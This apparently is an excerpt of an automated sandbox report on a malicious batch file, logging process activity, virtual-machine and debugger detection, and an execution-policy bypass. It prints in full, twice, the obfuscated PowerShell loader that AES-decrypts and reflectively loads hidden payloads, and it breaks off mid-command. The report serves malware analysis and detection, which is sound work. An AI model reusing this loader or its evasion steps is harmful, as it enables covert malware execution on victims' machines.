Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5134	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4740	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4934	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1558	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672	Thread sleep count: 5134 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672	Thread sleep count: 4740 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336	Thread sleep count: 4934 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336	Thread sleep count: 1558 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: wermgr.exe, 00000018.00000002.2633312947.000002528B694000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.2632335969.000002528B694000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.2632596589.000002528B694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wermgr.exe, 00000018.00000002.2633312947.000002528B694000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.2632335969.000002528B694000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000002.2633173470.000002528B60D000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.2632596589.000002528B694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\zap.cmd';$cmiy='reazbiwdzbiwlzbiwinzbiweszbiw'.replace('zbiw', ''),'lxpsboadxpsb'.replace('xpsb', ''),'cxfxwopxfxwytxfxwoxfxw'.replace('xfxw', ''),'chszniaszninsznigsznieexszniteszninsznisisznionszni'.replace('szni', ''),'decehezompehezrehezeehezssehez'.replace('ehez', ''),'elefriumenfriutfriuafriutfriu'.replace('friu', ''),'inwxpbvowxpbkwxpbewxpb'.replace('wxpb', ''),'geazgitcazgiurazgirenazgitazgipazgirocazgiessazgi'.replace('azgi', ''),'swavzpwavzliwavztwavz'.replace('wavz', ''),'trqrjdaqrjdnsqrjdfqrjdorqrjdmfiqrjdnqrjdaqrjdlqrjdbqrjdlqrjdoqrjdckqrjd'.replace('qrjd', ''),'eqbeyntqbeyrqbeyypqbeyoiqbeyntqbey'.replace('qbey', ''),'cfrrurefrruatfrruedfrruecrfrruyptfrruorfrru'.replace('frru', ''),'frostbembastbese6stbe4sstbetrstbeinstbegstbe'.replace('stbe', ''),'mlfllailfllnmlfllolflldlfllullfllelfll'.replace('lfll', '');powershell -w hidden;function iadmu($qwytb){$xhhyf=[system.security.cryptography.aes]::create();$xhhyf.mode=[system.security.cryptography.ciphermode]::cbc;$xhhyf.padding=[system.security.cryptography.paddingmode]::pkcs7;$xhhyf.key=[system.convert]::($cmiy[12])('tgqijckwwzqazylw/tfv+eer7szcl8pbscaalmr+5qk=');$xhhyf.iv=[system.convert]::($cmiy[12])('psyoatgwmebeiokwbsve0g==');$dsrrz=$xhhyf.($cmiy[11])();$quqau=$dsrrz.($cmiy[9])($qwytb,0,$qwytb.length);$dsrrz.dispose();$xhhyf.dispose();$quqau;}function xbiys($qwytb){$usnme=new-object system.io.memorystream(,$qwytb);$clidx=new-object system.io.memorystream;$gftqg=new-object system.io.compression.gzipstream($usnme,[io.compression.compressionmode]::($cmiy[4]));$gftqg.($cmiy[2])($clidx);$gftqg.dispose();$usnme.dispose();$clidx.dispose();$clidx.toarray();}$umafe=[system.io.file]::($cmiy[0])([console]::title);$zfldv=xbiys (iadmu ([convert]::($cmiy[12])([system.linq.enumerable]::($cmiy[5])($umafe, 5).substring(2))));$dchss=xbiys (iadmu ([convert]::($cmiy[12])([system.linq.enumerable]::($cmiy[5])($umafe, 